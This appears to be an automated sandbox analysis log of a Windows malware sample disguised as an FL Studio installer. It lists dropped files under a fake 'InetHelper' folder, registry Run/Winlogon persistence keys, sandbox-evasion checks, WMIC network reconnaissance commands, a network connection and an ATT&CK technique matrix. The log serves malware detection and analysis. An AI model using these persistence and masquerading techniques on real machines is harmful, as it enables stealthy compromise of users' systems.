Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exe Directory created: C:\Program Files\Image-Line
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exe Directory created: C:\Program Files\Image-Line\FL Studio 20
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exe Directory created: C:\Program Files\Image-Line\FL Studio 20\__tmp_rar_sfx_access_check_5937078
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exe Directory created: C:\Program Files\Image-Line\FL Studio 20\FL64.exe
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exe Directory created: C:\Program Files\Image-Line\FL Studio 20\FLEngine_x64.dll
Source: Replace.exe Static file information: File size 36540866 > 1048576
Source: Replace.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: compiler: cc /Zi /Fdossl_static.pdb -DOPENSSL_IA32_SSE2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAES_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPADLOCK_ASM -DPOLY1305_ASM source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp
Source: Binary string: !"#$% !"#$%&'()*+,-./0123456789:;<=>?@ABCD./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyzdes(long)compiler: cc /Zi /Fdossl_static.pdb -DOPENSSL_IA32_SSE2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAES_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPADLOCK_ASM -DPOLY1305_ASMbuilt on: Tue Mar 15 17:28:15 2022 UTCplatform: OPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "NUL"not available@@@@@@@@@hHHHH@@@@@@@@@@@@@@@@@@( source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: Replace.exe, 00000000.00000003.1668526597.0000000004074000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000002.00000000.1694241390.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmp, run.exe, 00000002.00000003.1696934689.0000019819FC2000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmp, run.exe, 00000002.00000003.1701249383.00000198188A8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\ws\out\Release\node.pdb source: node.exe, 0000000F.00000002.2913751697.0000000001801000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000001801000.00000040.00000001.01000000.0000000C.sdmp
Source: Replace.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Replace.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Replace.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Replace.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Replace.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: initial sample Static PE information: section where entry point is pointing to: .xda3
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exe File created: C:\Program Files\Image-Line\FL Studio 20\__tmp_rar_sfx_access_check_5937078
Source: wnsCCC1.tmp.7.dr Static PE information: real checksum: 0x0 should be: 0x6be3de
Source: node.exe.13.dr Static PE information: real checksum: 0x0 should be: 0x694243
Source: cleaner.exe.13.dr Static PE information: real checksum: 0x0 should be: 0x89c7
Source: wsc86FC.tmp.0.dr Static PE information: real checksum: 0x0 should be: 0x10fd7
Source: wnsF0F3.tmp.10.dr Static PE information: real checksum: 0x0 should be: 0x6be3de
Source: FL64.exe.2.dr Static PE information: real checksum: 0x49c24 should be: 0x4d1a4
Source: wnsA071.tmp.1.dr Static PE information: real checksum: 0x0 should be: 0x6be3de
Source: run.exe.0.dr Static PE information: section name: .didat
Source: run.exe.0.dr Static PE information: section name: _RDATA
Source: FL64.exe.2.dr Static PE information: section name: _RDATA
Source: FLEngine_x64.dll.2.dr Static PE information: section name: .didata
Source: FLEngine_x64.dll.2.dr Static PE information: section name: .xda0
Source: FLEngine_x64.dll.2.dr Static PE information: section name: .xda1
Source: FLEngine_x64.dll.2.dr Static PE information: section name: .xda2
Source: FLEngine_x64.dll.2.dr Static PE information: section name: .xda3
Source: C:\Users\user\Desktop\Replace.exe Code function: 0_2_00BD9153 push ecx; ret 0_2_00BD9166
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe Code function: 23_3_02134F08 push eax; ret 23_3_02134EE9
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe Code function: 23_3_02135130 push eax; retf 23_3_0213512D
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe Code function: 23_3_02133921 pushad ; ret 23_3_02133975
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe Code function: 23_3_02134D71 push eax; ret 23_3_02134EE9
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe Code function: 23_3_02134F74 push eax; retf 23_3_0213512D
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe Code function: 23_3_021335E9 push eax; iretd 23_3_021335F5
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe Code function: 30_3_02253921 pushad ; ret 30_3_02253975
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe Code function: 30_3_02255130 push eax; retf 30_3_0225512D
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe Code function: 30_3_02254F08 push eax; ret 30_3_02254EE9
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe Code function: 30_3_022535E9 push eax; iretd 30_3_022535F5
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe Code function: 30_3_02254F74 push eax; retf 30_3_0225512D
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe Code function: 30_3_02254D71 push eax; ret 30_3_02254EE9
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exe File created: C:\Program Files\Image-Line\FL Studio 20\FL64.exe
Source: C:\Users\user\Desktop\Replace.exe File created: C:\Users\user\AppData\Local\Temp\wsc86FC.tmp
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exe File created: C:\Program Files\Image-Line\FL Studio 20\FLEngine_x64.dll
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\wnsA071.tmp
Source: C:\Users\user\Desktop\Replace.exe File created: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exe
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmp File created: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\wnsF0F3.tmp
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmp
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmp File created: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmp Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmp Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run InetHelper
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmp Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce InetHelper
Source: C:\Windows\SysWOW64\rundll32.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce cleaninethelper

Hooking and other Techniques for Hiding and Protection

Source: unknown Network traffic detected: HTTP traffic on port 49757 -> 6101
Source: unknown Network traffic detected: HTTP traffic on port 6101 -> 49757
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmp Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmp Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\wnsF0F3.tmp Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\SysWOW64\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT DefaultIPGateway, GatewayCostMetric, IPConnectionMetric, Index FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled=true
Source: C:\Windows\SysWOW64\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT NetConnectionID, MACAddress FROM Win32_NetworkAdapter WHERE Index=1
Source: C:\Windows\SysWOW64\rundll32.exe Thread delayed: delay time: 200000
Source: C:\Windows\SysWOW64\rundll32.exe Window / User API: threadDelayed 1328
Source: C:\Windows\SysWOW64\rundll32.exe Window / User API: threadDelayed 1331
Source: C:\Windows\SysWOW64\rundll32.exe Window / User API: threadDelayed 1333
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exe Dropped PE file which has not been started: C:\Program Files\Image-Line\FL Studio 20\FL64.exe
Source: C:\Users\user\Desktop\Replace.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wsc86FC.tmp
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exe Dropped PE file which has not been started: C:\Program Files\Image-Line\FL Studio 20\FLEngine_x64.dll
Source: C:\Windows\SysWOW64\rundll32.exe Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess graph_1-204
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7612 Thread sleep time: -200000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7612 Thread sleep count: 1328 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 8348 Thread sleep time: -200000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 8348 Thread sleep count: 1331 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 8664 Thread sleep time: -200000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 8664 Thread sleep count: 1333 > 30
Source: C:\Windows\SysWOW64\rundll32.exe Thread sleep count: Count: 1328 delay: -10
Source: C:\Windows\SysWOW64\rundll32.exe Thread sleep count: Count: 1331 delay: -10
Source: C:\Windows\SysWOW64\rundll32.exe Thread sleep count: Count: 1333 delay: -10
Source: C:\Users\user\Desktop\Replace.exe Code function: 0_2_00BB2EFC FindFirstFileA,FindFirstFileW,0_2_00BB2EFC
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exe Code function: 2_2_00007FF75FB9B8F8 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,2_2_00007FF75FB9B8F8
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exe Code function: 2_2_00007FF75FBC0870 FindFirstFileExA,2_2_00007FF75FBC0870
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exe Code function: 2_2_00007FF75FBB0310 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,swprintf,SetDlgItemTextW,FindClose,swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,swprintf,SetDlgItemTextW,swprintf,SetDlgItemTextW,2_2_00007FF75FBB0310
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmp Code function: 13_2_0040672B FindFirstFileW,FindClose,13_2_0040672B
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmp Code function: 13_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,13_2_00405AFA
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmp Code function: 13_2_00402868 FindFirstFileW,13_2_00402868
Source: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmp Code function: 20_2_0040672B FindFirstFileW,FindClose,20_2_0040672B
Source: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmp Code function: 20_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,20_2_00405AFA
Source: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmp Code function: 20_2_00402868 FindFirstFileW,20_2_00402868
Source: C:\Users\user\Desktop\Replace.exe Code function: 0_2_00BB805B GetCurrentProcess,GetProcessAffinityMask,GetSystemInfo,0_2_00BB805B
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe File opened: C:\Users\user
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe File opened: C:\Users\user\AppData\Local\Microsoft
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper
Source: node.exe, 00000017.00000002.2243002549.00000000020E8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW3R
Source: rundll32.exe, 0000000A.00000002.2283478293.0000000002DDA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0
Source: rundll32.exe, 0000000A.00000002.2283478293.0000000002E08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP
Source: rundll32.exe, 00000001.00000002.2143068328.000000000291D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000002.2142874146.00000000028E3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.2108933637.000000000291D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2195281526.0000000002F6E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2229422282.0000000002F6E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2229301918.0000000002F2A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.2261502144.0000000002E33000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.2284339573.0000000002E34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.2261300042.0000000002E2B000.00000004.00000020.00020000.00000000.sdmp, node.exe, 0000000F.00000002.2921222937.0000000001F88000.00000004.00000020.00020000.00000000.sdmp, node.exe, 00000017.00000002.2243002549.00000000020E8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: node.exe, 0000001E.00000002.2323469953.000000000EC80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: lgnW2/4/PEZB31jiVg88O8EckzXZOFKs7sjsLjBOlDW0JB9LeGna8gI4zJVSk/BwJVmcIGfE
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exe API call chain: ExitProcess graph end node graph_2-21967
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmp API call chain: ExitProcess graph end node graph_13-3704
Source: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmp API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\Replace.exe Code function: 0_2_00BCC996 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00BCC996
Source: C:\Users\user\Desktop\Replace.exe Code function: 0_2_00BD269F mov eax, dword ptr fs:[00000030h] 0_2_00BD269F
Source: C:\Users\user\Desktop\Replace.exe Code function: 0_2_00BD26E3 mov eax, dword ptr fs:[00000030h] 0_2_00BD26E3
Source: C:\Users\user\Desktop\Replace.exe Code function: 0_2_00BD0F91 mov eax, dword ptr fs:[00000030h] 0_2_00BD0F91
Source: C:\Users\user\Desktop\Replace.exe Code function: 0_2_00BD4909 GetProcessHeap,0_2_00BD4909
Source: C:\Users\user\Desktop\Replace.exe Code function: 0_2_00BD1922 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00BD1922
Source: C:\Users\user\Desktop\Replace.exe Code function: 0_2_00BCCB2A SetUnhandledExceptionFilter,0_2_00BCCB2A
Source: C:\Users\user\Desktop\Replace.exe Code function: 0_2_00BCBE82 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00BCBE82
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exe Code function: 2_2_00007FF75FBC6D04 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF75FBC6D04
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exe Code function: 2_2_00007FF75FBB43E0 SetUnhandledExceptionFilter,2_2_00007FF75FBB43E0
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exe Code function: 2_2_00007FF75FBBDB3C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF75FBBDB3C
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exe Code function: 2_2_00007FF75FBB41FC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF75FBB41FC

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 172.67.152.151 443
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exeCode function: EntryPoint,GetModuleFileNameW,_wsplitpath,GetCommandLineW,wcsstr,CreateToolhelp32Snapshot,memset,Process32FirstW,CloseHandle,_wcsicmp,_wcsicmp,OpenProcess,QueryFullProcessImageNameW,_wcsicmp,TerminateProcess,CloseHandle,Process32NextW,CloseHandle,CreateFileW,free,FindCloseChangeNotification,MoveFileExW,memset,CreateFileW,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,DuplicateHandle,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,CloseHandle,FindCloseChangeNotification,free,free,free,memset,CreateProcessW,free,CloseHandle,CloseHandle,CloseHandle,CloseHandle,RegCreateKeyExW,wcslen,wcslen,RegSetValueExW,RegSetValueExW,RegCloseKey,RegCloseKey,free,RegCreateKeyExW,wcslen,RegSetValueExW,RegCloseKey, explorer.exe,"14_2_00ED107D
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exeCode function: EntryPoint,GetModuleFileNameW,_wsplitpath,GetCommandLineW,wcsstr,CreateToolhelp32Snapshot,memset,Process32FirstW,CloseHandle,_wcsicmp,_wcsicmp,OpenProcess,QueryFullProcessImageNameW,_wcsicmp,TerminateProcess,CloseHandle,Process32NextW,CloseHandle,CreateFileW,free,FindCloseChangeNotification,MoveFileExW,memset,CreateFileW,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,DuplicateHandle,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,CloseHandle,FindCloseChangeNotification,free,free,free,memset,CreateProcessW,free,CloseHandle,CloseHandle,CloseHandle,CloseHandle,RegCreateKeyExW,wcslen,wcslen,RegSetValueExW,RegSetValueExW,RegCloseKey,RegCloseKey,free,RegCreateKeyExW,wcslen,RegSetValueExW,RegCloseKey, explorer.exe,"22_2_0057107D
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exeCode function: EntryPoint,GetModuleFileNameW,_wsplitpath,GetCommandLineW,wcsstr,CreateToolhelp32Snapshot,memset,Process32FirstW,CloseHandle,_wcsicmp,_wcsicmp,OpenProcess,QueryFullProcessImageNameW,_wcsicmp,TerminateProcess,CloseHandle,Process32NextW,CloseHandle,CreateFileW,free,FindCloseChangeNotification,MoveFileExW,memset,CreateFileW,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,DuplicateHandle,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,CloseHandle,FindCloseChangeNotification,free,free,free,memset,CreateProcessW,free,CloseHandle,CloseHandle,CloseHandle,CloseHandle,RegCreateKeyExW,wcslen,wcslen,RegSetValueExW,RegSetValueExW,RegCloseKey,RegCloseKey,free,RegCreateKeyExW,wcslen,RegSetValueExW,RegCloseKey, explorer.exe,"29_2_00FE107D
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe" "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\service.js"
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapter where Index=1 get NetConnectionID,MACAddress /format:table
Source: run.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
Source: run.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: EffectsShell_TrayWnd
Source: C:\Users\user\Desktop\Replace.exeCode function: 0_2_00BC08B5 cpuid 0_2_00BC08B5
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeCode function: GetLocaleInfoW,GetNumberFormatW,2_2_00007FF75FBAEC5C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\service.js VolumeInformation
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeQueries volume information: C:\Users VolumeInformation
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeQueries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeQueries volume information: C:\Users\user\AppData VolumeInformation
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeQueries volume information: C:\Users\user\AppData\Local VolumeInformation
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft VolumeInformation
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows VolumeInformation
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper VolumeInformation
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeQueries volume information: C:\Windows\SysWOW64\wbem\WMIC.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper.status VolumeInformation
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\vp VolumeInformation
Source: C:\Users\user\Desktop\Replace.exeCode function: 0_2_00BCC886 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00BCC886
Source: C:\Users\user\Desktop\Replace.exeCode function: 0_2_00BCB658 __EH_prolog3_GS,GetVersionExA,CreateThread,GetCommandLineW,MessageBoxW,MessageBoxW,MessageBoxW,ShellExecuteExA,MessageBoxW,MessageBoxW,CreateProcessA,CloseHandle,WaitForSingleObject,WaitForSingleObject,CloseHandle,WaitForSingleObject,CloseHandle,0_2_00BCB658
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | Default Accounts | 3 Command and Scripting Interpreter | 1 Windows Service | 1 Access Token Manipulation | 21 Obfuscated Files or Information | LSASS Memory | 3 File and Directory Discovery | Remote Desktop Protocol | 1 Clipboard Data | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 1 Service Execution | 21 Registry Run Keys / Startup Folder | 1 Windows Service | 11 Software Packing | Security Account Manager | 35 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 11 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 122 Process Injection | 1 DLL Side-Loading | NTDS | 221 Security Software Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 21 Registry Run Keys / Startup Folder | 3 Masquerading | LSA Secrets | 131 Virtualization/Sandbox Evasion | SSH | Keylogging | 3 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 131 Virtualization/Sandbox Evasion | Cached Domain Credentials | 3 Process Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
